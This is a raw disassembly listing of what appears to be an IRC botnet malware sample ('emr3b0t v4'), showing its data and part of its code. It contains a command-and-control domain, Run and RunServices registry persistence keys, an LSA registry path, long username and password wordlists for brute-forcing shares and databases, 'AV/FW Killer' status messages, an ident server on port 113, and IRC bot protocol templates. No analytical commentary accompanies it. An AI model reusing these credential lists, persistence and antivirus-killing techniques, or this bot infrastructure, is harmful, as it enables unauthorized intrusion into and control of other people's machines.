dword_43E08C dd 6D635F61h, 632E70h ; DATA XREF: sub_439AD0+17F�o
aCchcount10Cchc db 'cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0',0
; DATA XREF: sub_439AD0:loc_439C43�o
align 8
dword_43E0D8 dd 0FFFFFFFFh, 439DAFh, 439DB5h, 0FFFFFFFFh, 439E4Dh, 439E53h
; DATA XREF: sub_439AD0+5�o
dword_43E0F0 dd 65746573h, 632E766Eh, 0 ; DATA XREF: sub_439F20+B2�o
; sub_439F20+F2�o ...
aStringTooLong db 'string too long',0 ; DATA XREF: sub_43A460+1F�o
dd offset dword_43E208
off_43E110 dd offset sub_43A5E0 ; DATA XREF: sub_43A4C0+44�o
; sub_43A580+1F�o ...
dd offset sub_43A530
dd offset sub_43A550
dd offset dword_43E258
off_43E120 dd offset sub_43A700 ; DATA XREF: sub_43A610+16�o
; sub_43A6B0+A�o ...
dd offset sub_43A530
dd offset sub_43A6D0
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_43A760+1F�o
dd offset dword_43E2A8
off_43E148 dd offset sub_43A840 ; DATA XREF: sub_43A7C0+16�o
; sub_43A7F0+A�o ...
dd offset sub_43A530
dd offset sub_43A810
dd 0FFFFFFFFh, 43E2D8h
off_43E15C dd offset sub_43AF20 ; DATA XREF: _0:0043AEFA�o
; sub_43AF50+C�o ...
dd offset sub_43B0C0
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_43B0C0:loc_43B0D8�o
align 4
dd offset dword_43E320
off_43E17C dd offset sub_43B130 ; DATA XREF: sub_43B0F0+A�o
; _0:0043B21A�o ...
dword_43E180 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_43B240+D�o
dd 3, 19930520h, 2 dup(0)
dword_43E1A0 dd 0FFFFFFFFh, 43B55Fh, 43B565h, 0FFFFFFFFh, 43B604h, 43B60Ah
; DATA XREF: sub_43B420+5�o
dd 4550E0h, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_43E1D0 dd offset off_4550F8 ; DATA XREF: _1:0043E1E8�o _1:0043E23C�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43E1D0
dd offset dword_43E1A0+18h
dword_43E1F0 dd 4 dup(0) ; DATA XREF: _1:0043E218�o
dd 2, 43E1E8h
dword_43E208 dd 3 dup(0) ; DATA XREF: _1:0043E10C�o
dd offset off_4550F8
dd offset dword_43E1F0+8
align 10h
off_43E220 dd offset off_455118 ; DATA XREF: _1:0043E238�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43E220
dd offset off_43E1D0
dd offset dword_43E1A0+18h
dd 0
db 0 ; DATA XREF: _1:0043E268�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 43E238h
dword_43E258 dd 3 dup(0) ; DATA XREF: _1:0043E11C�o
dd offset off_455118
dd offset unk_43E248
align 10h
off_43E270 dd offset off_455138 ; DATA XREF: _1:0043E288�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43E270
dd offset off_43E1D0
dd offset dword_43E1A0+18h
dd 0
db 0 ; DATA XREF: _1:0043E2B8�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 43E288h
dword_43E2A8 dd 3 dup(0) ; DATA XREF: _1:0043E144�o
dd offset off_455138
dd offset unk_43E298
dd offset dword_43E1A0+18h
dword_43E2C0 dd 4 dup(0) ; DATA XREF: _1:0043E2E8�o
dd 1, 43E2BCh, 3 dup(0)
dd offset off_4550E0
dd offset dword_43E2C0+8
align 10h
off_43E2F0 dd offset off_455158 ; DATA XREF: _1:0043E308�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43E2F0
dword_43E30C dd 3 dup(0) ; DATA XREF: _1:0043E330�o
dd 1, 43E308h
dword_43E320 dd 3 dup(0) ; DATA XREF: _1:0043E178�o
dd offset off_455158
dd offset dword_43E30C+4
align 8
dd 0FFFFFFFFh, 43B818h, 0
dd offset loc_43B810
dword_43E348 dd 19930520h, 2, 43E338h, 4 dup(0) ; DATA XREF: _0:loc_43B82F�o
dd 0FFFFFFFFh, 43B839h, 0
dd offset loc_43B841
dword_43E374 dd 19930520h, 2, 43E364h, 4 dup(0) ; DATA XREF: _0:loc_43B849�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_40E096
dd 2 dup(0)
dd 2 dup(1), 43E3A0h
dword_43E3C4 dd 19930520h, 2, 43E390h, 1, 43E3B0h, 3 dup(0) ; DATA XREF: _0:loc_43B854�o
dd offset off_4550E0
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 43AFC0h, 2 dup(0)
dd offset off_4550F8
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 43A4C0h, 2 dup(0)
dd offset off_455118
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 43A730h, 0
dword_43E440 dd 3, 43E420h, 43E400h, 43E3E0h ; DATA XREF: _1:0043E45C�o
dword_43E450 dd 0 ; DATA XREF: sub_43A460+3F�o
; sub_43A6D0+15�o
dd offset sub_43A6B0
dd 0
dd offset dword_43E440
dword_43E460 dd 19930520h, 1, 43E480h, 5 dup(0) ; DATA XREF: SEH_43A460�o
dd 0FFFFFFFFh, 43B860h
dword_43E488 dd 19930520h, 1, 43E4A8h, 5 dup(0) ; DATA XREF: SEH_43A4C0�o
dword_43E4A8 dd 0FFFFFFFFh, 43B880h, 2, 43E400h, 43E3E0h, 0 ; DATA XREF: _1:0043E4CC�o
dword_43E4C0 dd 0 ; DATA XREF: sub_43A550+15�o
dd offset sub_43A580
dd 0
dd offset dword_43E4A8+8
dword_43E4D0 dd 19930520h, 1, 43E4F0h, 5 dup(0) ; DATA XREF: SEH_43A580�o
dd 0FFFFFFFFh, 43B8A0h
dword_43E4F8 dd 19930520h, 1, 43E518h, 5 dup(0) ; DATA XREF: SEH_43A640�o
dd 0FFFFFFFFh, 43B8C0h, 0
dd offset off_455138
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 43A870h, 0
dword_43E540 dd 3, 43E520h, 43E400h, 43E3E0h ; DATA XREF: _1:0043E55C�o
dword_43E550 dd 0 ; DATA XREF: sub_43A760+3F�o
; sub_43A810+15�o
dd offset sub_43A7F0
dd 0
dd offset dword_43E540
dword_43E560 dd 19930520h, 1, 43E580h, 5 dup(0) ; DATA XREF: SEH_43A760�o
dd 0FFFFFFFFh, 43B8E0h
_1 ends
; Section 3. (virtual address 0003F000)
; Virtual size : 000B5A3D ( 743997.)
; Section size in file : 000B5A3D ( 743997.)
; Offset to raw data for section: 0003F000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_2 segment para public 'CODE' use32
assume cs:_2
;org 43F000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_43F000 dd 0 ; DATA XREF: sub_41E860+29�o
dd offset loc_4013E8
dd offset loc_40DBC6
dd offset sub_40E19A
dd offset sub_40F033
dd offset sub_43A8A0
dword_43F018 dd 0 ; DATA XREF: sub_41E860+24�o
dword_43F01C dd 0 ; DATA XREF: sub_41E860+17�o
dd offset sub_420D30
dd offset sub_4222D0
dd offset sub_429890
dd offset sub_432F40
dword_43F030 dd 0 ; DATA XREF: sub_41E860:loc_41E872�o
dword_43F034 dd 0 ; DATA XREF: sub_41E920+76�o
dd offset sub_422400
dword_43F03C dd 0 ; DATA XREF: sub_41E920:loc_41E991�o
dword_43F040 dd 0 ; DATA XREF: sub_41E920+88�o
dd offset sub_432F60
dword_43F048 dd 2 dup(0) ; DATA XREF: sub_41E920:loc_41E9A3�o
dword_43F050 dd 80000002h ; DATA XREF: sub_401000+24�r
off_43F054 dd offset byte_43F1EC ; DATA XREF: sub_401000+1E�r
dd 80000002h, 43F21Ch, 80000001h, 43F1ECh
dword_43F068 dd 6272h, 0 ; DATA XREF: sub_4010AA+B�o
dword_43F070 dd 1F90h ; DATA XREF: sub_401404+48F�r
; sub_401404+517�r
dword_43F074 dd 1F91h ; DATA XREF: sub_401404+55D�r
dword_43F078 dd 7E4h ; DATA XREF: sub_401C87:loc_4047CE�r
dword_43F07C dd 45h ; DATA XREF: sub_401C87+2030�r
; sub_40C049+3B�r
dword_43F080 dd 7D1h ; DATA XREF: sub_401C87:loc_403DA1�r
; sub_40C049:loc_40C431�r
dword_43F084 dd 201h ; DATA XREF: sub_401C87:loc_403F16�r
word_43F088 dw 7C7h ; DATA XREF: sub_401C87:loc_4048F0�r
align 4
dword_43F08C dd 1 ; DATA XREF: sub_401C87+62A�r
dword_43F090 dd 1 ; DATA XREF: sub_401404+13A�r
dword_43F094 dd 1 ; DATA XREF: sub_401404:loc_401733�r
; sub_418EAE+C�r
byte_43F098 db 2Eh ; DATA XREF: sub_401C87+A51�r
; sub_401C87+B0B�r ...
align 4
dword_43F09C dd 5 ; DATA XREF: sub_40AFAB+39�r
; sub_40AFAB+5F�r ...
dword_43F0A0 dd 4 ; DATA XREF: sub_4019A5+78�r
; sub_401C87+277�r ...
dword_43F0A4 dd 1 ; DATA XREF: sub_4019A5+72�r
; sub_401C87+271�r
aTarab db 'Tarab',0 ; DATA XREF: sub_401404+5D�o
; sub_401C87:loc_404628�o ...
align 10h
aEmr3b0tV4 db 'emr3b0t v4',0 ; DATA XREF: sub_401C87:loc_404AF5�o
align 4
a3zef db '3zef',0 ; DATA XREF: sub_401C87+7E34�o
; sub_401C87+7EF7�o
align 4
aSakenQlbe_net db 'saken-qlbe.net',0 ; DATA XREF: sub_401404+47B�o
; sub_401404+508�o
align 4
a0 db '#0#',0 ; DATA XREF: sub_401404+49B�o
; sub_401404+51E�o ...
a7lome db '7lome',0 ; DATA XREF: sub_401404+4B2�o
; sub_401404+530�o
align 10h
byte_43F0E0 db 73h ; DATA XREF: sub_401404:loc_401944�r
; sub_401404+54E�o
db 61h, 6Bh, 65h
dd 6C712D6Eh, 6E2E6562h, 7465h
dword_43F0F0 dd 233023h ; DATA XREF: sub_401404+564�o
a7lome_0 db '7lome',0 ; DATA XREF: sub_401404+576�o
align 4
byte_43F0FC db 79h ; DATA XREF: sub_401404+140�o
; sub_401404+164�w ...
db 2 dup(67h), 76h
dd 6578652Eh, 0
dword_43F108 dd 696E6977h, 622E746Eh, 7461h ; DATA XREF: sub_4124E6+3D�o
aWindowsService db 'Windows Service Agent',0 ; DATA XREF: sub_401000+B�o
asc_43F12A db '-',0 ; DATA XREF: _0:0040B029�o
aWintys_dat db 'wintys.dat',0
align 4
aXI db '-x+i',0 ; DATA XREF: sub_401C87+7F70�o
align 10h
a2 db '#2',0 ; DATA XREF: sub_401C87+1CF2�o
; sub_401C87+3053�o ...
align 4
a2_0 db '#2',0 ; DATA XREF: sub_401C87+4477�o
align 4
a2_1 db '#2',0 ; DATA XREF: sub_401C87+40A3�o
; sub_401C87+41F1�o
align 4
a@admin_com db '*@admin.com',0 ; DATA XREF: _2:off_43F158�o
off_43F158 dd offset a@admin_com ; DATA XREF: sub_401C87+7E97�r
; "*@admin.com"
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: _2:off_43F1DC�o
align 4
aMircV6_17Khale db 'mIRC v6.17 Khaled Mardam-Bey',0 ; DATA XREF: _2:0043F1E0�o
align 4
aMircV6_20Khale db 'mIRC v6.20 Khaled Mardam-Bey',0 ; DATA XREF: _2:0043F1E4�o
align 4
aMircV6_21Khale db 'mIRC v6.21 Khaled Mardam-Bey',0 ; DATA XREF: _2:0043F1E8�o
align 4
off_43F1DC dd offset aMircV6_16Khale ; DATA XREF: sub_401C87+874�r
; "mIRC v6.16 Khaled Mardam-Bey"
dd offset aMircV6_17Khale ; "mIRC v6.17 Khaled Mardam-Bey"
dd offset aMircV6_20Khale ; "mIRC v6.20 Khaled Mardam-Bey"
dd offset aMircV6_21Khale ; "mIRC v6.21 Khaled Mardam-Bey"
byte_43F1EC db 53h ; DATA XREF: _2:off_43F054�o
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\Run',0
align 4
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_41AB05+28�o
; sub_41AE2B+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_41AB05+D4�o
; sub_41AE2B+D4�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: _2:0043F350�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: _2:0043F354�o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: _2:0043F358�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: _2:0043F35C�o
aAdmins db 'admins',0 ; DATA XREF: _2:0043F360�o
align 4
aAdmin db 'admin',0 ; DATA XREF: _2:0043F364�o
align 10h
aStaff db 'staff',0 ; DATA XREF: _2:0043F368�o
align 4
aRoot db 'root',0 ; DATA XREF: _2:0043F36C�o
align 10h
aComputer db 'computer',0 ; DATA XREF: _2:0043F370�o
align 4
aOwner db 'owner',0 ; DATA XREF: _2:0043F374�o
align 4
aStudent db 'student',0 ; DATA XREF: _2:0043F378�o
aTeacher db 'teacher',0 ; DATA XREF: _2:0043F37C�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: _2:0043F380�o
align 10h
aGuest_0 db 'guest',0 ; DATA XREF: _2:0043F384�o
align 4
aDefault db 'default',0 ; DATA XREF: _2:0043F388�o
aDatabase db 'database',0 ; DATA XREF: _2:0043F38C�o
align 4
aDba db 'dba',0 ; DATA XREF: _2:0043F390�o
aOracle db 'oracle',0 ; DATA XREF: _2:0043F394�o
align 4
aDb2 db 'db2',0 ; DATA XREF: _2:0043F398�o
align 10h
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 10h
aAdministrato_1 db 'administrator',0 ; DATA XREF: _2:0043F814�o
align 10h
aAdministrado_0 db 'administrador',0 ; DATA XREF: _2:0043F818�o
align 10h
aAdministrate_0 db 'administrateur',0 ; DATA XREF: _2:0043F81C�o
align 10h
aAdministrat_0 db 'administrat',0 ; DATA XREF: _2:0043F820�o
aAdmins_0 db 'admins',0 ; DATA XREF: _2:0043F824�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: _2:0043F828�o
align 4
aAdm db 'adm',0 ; DATA XREF: _2:0043F82C�o
aPassword1 db 'password1',0 ; DATA XREF: _2:0043F830�o
align 4
aPassword db 'password',0 ; DATA XREF: _2:0043F834�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: _2:0043F838�o
align 10h
aPass1234 db 'pass1234',0 ; DATA XREF: _2:0043F83C�o
align 4
aPass_1 db 'pass',0 ; DATA XREF: _2:0043F840�o
align 4
aPwd db 'pwd',0 ; DATA XREF: _2:0043F844�o
a007 db '007',0 ; DATA XREF: _2:0043F848�o
a1: ; DATA XREF: _2:0043F84C�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: _2:0043F850�o
align 4
a123 db '123',0 ; DATA XREF: _2:0043F854�o
a1234 db '1234',0 ; DATA XREF: _2:0043F858�o
align 10h
a12345 db '12345',0 ; DATA XREF: _2:0043F85C�o
align 4
a123456 db '123456',0 ; DATA XREF: _2:0043F860�o
align 10h
a1234567 db '1234567',0 ; DATA XREF: _2:0043F864�o
a12345678 db '12345678',0 ; DATA XREF: _2:0043F868�o
align 4
a123456789 db '123456789',0 ; DATA XREF: _2:0043F86C�o
align 10h
a1234567890 db '1234567890',0 ; DATA XREF: _2:0043F870�o
align 4
a2000 db '2000',0 ; DATA XREF: _2:0043F874�o
align 4
a2001 db '2001',0 ; DATA XREF: _2:0043F878�o
align 4
a2002 db '2002',0 ; DATA XREF: _2:0043F87C�o
align 4
a2003_0 db '2003',0 ; DATA XREF: _2:0043F880�o
align 4
a2004 db '2004',0 ; DATA XREF: _2:0043F884�o
align 4
aTest db 'test',0 ; DATA XREF: _2:0043F888�o
align 4
aGuest_1 db 'guest',0 ; DATA XREF: _2:0043F88C�o
align 4
aNone db 'none',0 ; DATA XREF: _2:0043F890�o
align 4
aDemo db 'demo',0 ; DATA XREF: _2:0043F894�o
align 4
aUnix db 'unix',0 ; DATA XREF: _2:0043F898�o
align 4
aLinux db 'linux',0 ; DATA XREF: _2:0043F89C�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: _2:0043F8A0�o
align 10h
aDefault_0 db 'default',0 ; DATA XREF: _2:0043F8A4�o
aSystem db 'system',0 ; DATA XREF: _2:0043F8A8�o
align 10h
aServer_6 db 'server',0 ; DATA XREF: _2:0043F8AC�o
align 4
aRoot_0 db 'root',0 ; DATA XREF: _2:0043F8B0�o
align 10h
aNull_1 db 'null',0 ; DATA XREF: _2:0043F8B4�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: _2:0043F8B8�o
align 10h
aMail db 'mail',0 ; DATA XREF: _2:0043F8BC�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: _2:0043F8C0�o
aWeb db 'web',0 ; DATA XREF: _2:0043F8C4�o
aWww db 'www',0 ; DATA XREF: _2:0043F8C8�o
aInternet db 'internet',0 ; DATA XREF: _2:0043F8CC�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: _2:0043F8D0�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: _2:0043F8D4�o
align 4
aHome db 'home',0 ; DATA XREF: _2:0043F8D8�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: _2:0043F8DC�o
align 10h
aUser_4 db 'user',0 ; DATA XREF: _2:0043F8E0�o
align 4
aOem db 'oem',0 ; DATA XREF: _2:0043F8E4�o
aOemuser db 'oemuser',0 ; DATA XREF: _2:0043F8E8�o
aOeminstall db 'oeminstall',0 ; DATA XREF: _2:0043F8EC�o
align 10h
aWindows db 'windows',0 ; DATA XREF: _2:0043F8F0�o
aWin98 db 'win98',0 ; DATA XREF: _2:0043F8F4�o
align 10h
aWin2k db 'win2k',0 ; DATA XREF: _2:0043F8F8�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: _2:0043F8FC�o
align 10h
aWinnt db 'winnt',0 ; DATA XREF: _2:0043F900�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: _2:0043F904�o
aQaz db 'qaz',0 ; DATA XREF: _2:0043F908�o
aAsd db 'asd',0 ; DATA XREF: _2:0043F90C�o
aZxc db 'zxc',0 ; DATA XREF: _2:0043F910�o
aQwe db 'qwe',0 ; DATA XREF: _2:0043F914�o
aBob db 'bob',0 ; DATA XREF: _2:0043F918�o
aJen db 'jen',0 ; DATA XREF: _2:0043F91C�o
aJoe db 'joe',0 ; DATA XREF: _2:0043F920�o
aFred db 'fred',0 ; DATA XREF: _2:0043F924�o
align 4
aBill db 'bill',0 ; DATA XREF: _2:0043F928�o
align 4
aMike db 'mike',0 ; DATA XREF: _2:0043F92C�o
align 4
aJohn db 'john',0 ; DATA XREF: _2:0043F930�o
align 4
aPeter db 'peter',0 ; DATA XREF: _2:0043F934�o
align 4
aLuke db 'luke',0 ; DATA XREF: _2:0043F938�o
align 4
aSam db 'sam',0 ; DATA XREF: _2:0043F93C�o
aSue db 'sue',0 ; DATA XREF: _2:0043F940�o
aSusan db 'susan',0 ; DATA XREF: _2:0043F944�o
align 4
aPeter_0 db 'peter',0
align 4
aBrian db 'brian',0
align 4
aLee db 'lee',0
aNeil db 'neil',0
align 4
aIan db 'ian',0
aChris db 'chris',0
align 4
aEric db 'eric',0
align 4
aGeorge db 'george',0
align 4
aKate db 'kate',0
align 4
aBob_0 db 'bob',0
aKatie db 'katie',0
align 4
aMary db 'mary',0
align 10h
aLogin_0 db 'login',0
align 4
aLoginpass db 'loginpass',0
align 4
aTechnical db 'technical',0
align 10h
aBackup db 'backup',0
align 4
aExchange db 'exchange',0
align 4
aFuck db 'fuck',0
align 4
aBitch db 'bitch',0
align 4
aSlut db 'slut',0
align 4
aSex db 'sex',0
aGod db 'god',0
aHell db 'hell',0
align 4
aHello db 'hello',0
align 4
aDomain db 'domain',0
align 4
aDomainpass db 'domainpass',0
align 4
aDomainpassword db 'domainpassword',0
align 4
aDatabase_0 db 'database',0
align 4
aAccess db 'access',0
align 4
aDbpass db 'dbpass',0
align 4
aDbpassword db 'dbpassword',0
align 10h
aDatabasepass db 'databasepass',0 ; DATA XREF: _2:0043F9C1�o
align 10h
aData db 'data',0
align 4
aDatabasepasswo db 'databasepassword',0
align 4
aDb1 db 'db1',0 ; DATA XREF: _2:0043F9CD�o
aDb2_0 db 'db2',0
aDb1234 db 'db1234',0 ; DATA XREF: _2:0043F9D5�o
align 4
aSa_0 db 'sa',0
align 10h
aSql db 'sql',0 ; DATA XREF: _2:0043F9DD�o
aSqlpassoainsta db 'sqlpassoainstall',0
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: _2:loc_43F9E5�o
align 4
aOracle_0 db 'oracle',0
align 4
aIbm db 'ibm',0
aCisco db 'cisco',0
align 4
aDell db 'dell',0
align 10h
aCompaq db 'compaq',0 ; DATA XREF: _2:0043F9F9�o
align 4
aSiemens db 'siemens',0
aHp db 'hp',0 ; DATA XREF: _2:0043FA01�o
align 4
aNokia db 'nokia',0
align 4
aXp db 'xp',0 ; DATA XREF: _2:0043FA09�o
align 10h
aControl db 'control',0
aOffice db 'office',0
align 10h
aBlank db 'blank',0
align 4
aWinpass db 'winpass',0 ; DATA XREF: _2:0043FA19�o
aMain db 'main',0
align 4
aLan db 'lan',0
aInternet_0 db 'internet',0 ; DATA XREF: _2:0043FA25�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: _2:0043FA2C�o
align 4
aStudent_0 db 'student',0 ; DATA XREF: _2:0043FA30�o
aTeacher_0 db 'teacher',0 ; DATA XREF: _2:0043FA34�o
aStaff_0 db 'staff',0 ; DATA XREF: _2:0043FA38�o
align 10h
dd offset byte_4E2E6D
dd offset aAdministrato_1 ; "administrator"
dd offset aAdministrado_0 ; "administrador"
dd offset aAdministrate_0 ; "administrateur"
dd offset aAdministrat_0 ; "administrat"
dd offset aAdmins_0 ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_1 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003_0 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_1 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault_0 ; "default"
dd offset aSystem ; "system"
dd offset aServer_6 ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_4 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
; ---------------------------------------------------------------------------
or al, 0F6h
inc ebx
add [esi+esi*8], dl
inc ebx
add [esi+esi*8], bl
inc ebx
add [eax], ah
test byte ptr [ebx+0], 28h
test byte ptr [ebx+0], 2Ch
test byte ptr [ebx+0], 34h
test byte ptr [ebx+0], 3Ch
test byte ptr [ebx+0], 44h
test byte ptr [ebx+0], 4Ch
test byte ptr [ebx+0], 50h
test byte ptr [ebx+0], 58h
test byte ptr [ebx+0], 60h
test byte ptr [ebx+0], 68h
test byte ptr [ebx+0], 74h
test byte ptr [ebx+0], 80h
test byte ptr [ebx+0], 88h
test byte ptr [ebx+0], 94h
test byte ptr [ebx+0], 9Ch
test byte ptr [ebx+0], 0A4h
test byte ptr [ebx+0], 0ACh
test byte ptr [ebx+0], 0B0h
test byte ptr [ebx+0], 0B4h
test byte ptr [ebx+0], 0BCh
test byte ptr [ebx+0], 0C4h
test byte ptr [ebx+0], 0CCh
test byte ptr [ebx+0], 0D8h
test byte ptr [ebx+0], 0E8h
test byte ptr [ebx+0], 0F4h
test byte ptr [ebx+0], 0FCh
test byte ptr [ebx+0], 4
test dword ptr [ebx+0], offset aDatabasepass ; "databasepass"
and bh, dh
inc ebx
add [eax], ch
test dword ptr [ebx+0], offset aDb1 ; "db1"
inc eax
test dword ptr [ebx+0], offset aDb1234 ; "db1234"
dec esp
test dword ptr [ebx+0], offset aSql ; "sql"
push esp
loc_43F9E5: ; CODE XREF: _2:0043F9EC�j
test dword ptr [ebx+0], offset aOrainstall ; "orainstall"
jz short loc_43F9E5
inc ebx
add [edi+esi*8+43h], bh
add [eax-77FFBC09h], al
test dword ptr [ebx+0], offset aCompaq ; "compaq"
cwde
test dword ptr [ebx+0], offset aHp ; "hp"
movsb
test dword ptr [ebx+0], offset aXp ; "xp"
mov al, 0F7h
inc ebx
add [eax-3FFFBC09h], bh
test dword ptr [ebx+0], offset aWinpass ; "winpass"
sal bh, 1
inc ebx
add al, bl
test dword ptr [ebx+0], offset aInternet_0 ; "internet"
; ---------------------------------------------------------------------------
dd offset aIntranet ; "intranet"
dd offset aStudent_0 ; "student"
dd offset aTeacher_0 ; "teacher"
dd offset aStaff_0 ; "staff"
align 10h
dword_43FA40 dd 10h ; DATA XREF: sub_401C87+ABB�r
; sub_401C87+AE7�r ...
dword_43FA44 dd 73257325h, 0 ; DATA XREF: sub_401404+10A�o
dword_43FA4C dd 255C7325h, 73h ; DATA XREF: sub_401404+186�o
dword_43FA54 dd 25207325h, 25222064h, 2273h ; DATA XREF: sub_401404+27D�o
dword_43FA60 dd 234032Dh, 6E69616Dh, 202D0203h, 20746F42h, 72617473h
; DATA XREF: sub_401404+352�o
dd 2E646574h, 0
unk_43FA7C db 2Dh ; - ; DATA XREF: sub_401404+38D�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 10h
unk_43FAA0 db 2Dh ; - ; DATA XREF: sub_401404+3DE�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 10h
dword_43FAE0 dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401404+40B�o
aServerRunningO db '- Server running on Port: 113.',0
align 4
dword_43FB0C dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401404+456�o
aFailedToStartS db '- Failed to start server, error: <%d>.',0
align 10h
unk_43FB40 db 2Dh ; - ; DATA XREF: sub_4019A5+F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aConnectedToS_ db 'Connected to %s.',0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401B0B+35�o
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_401B0B+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
asc_43FB88 db ' :',0 ; DATA XREF: sub_401C87+86�o
align 4
asc_43FB8C: ; DATA XREF: sub_401C87+AE�o
unicode 0, < !>,0
aPing db 'PING',0 ; DATA XREF: sub_401C87+19D�o
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+1B7�o
align 4
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+1D8�o
align 4
a001 db '001',0 ; DATA XREF: sub_401C87+1F4�o
a005 db '005',0 ; DATA XREF: sub_401C87+209�o
a302 db '302',0 ; DATA XREF: sub_401C87+21E�o
a@: ; DATA XREF: sub_401C87+22E�o
unicode 0, <@>,0
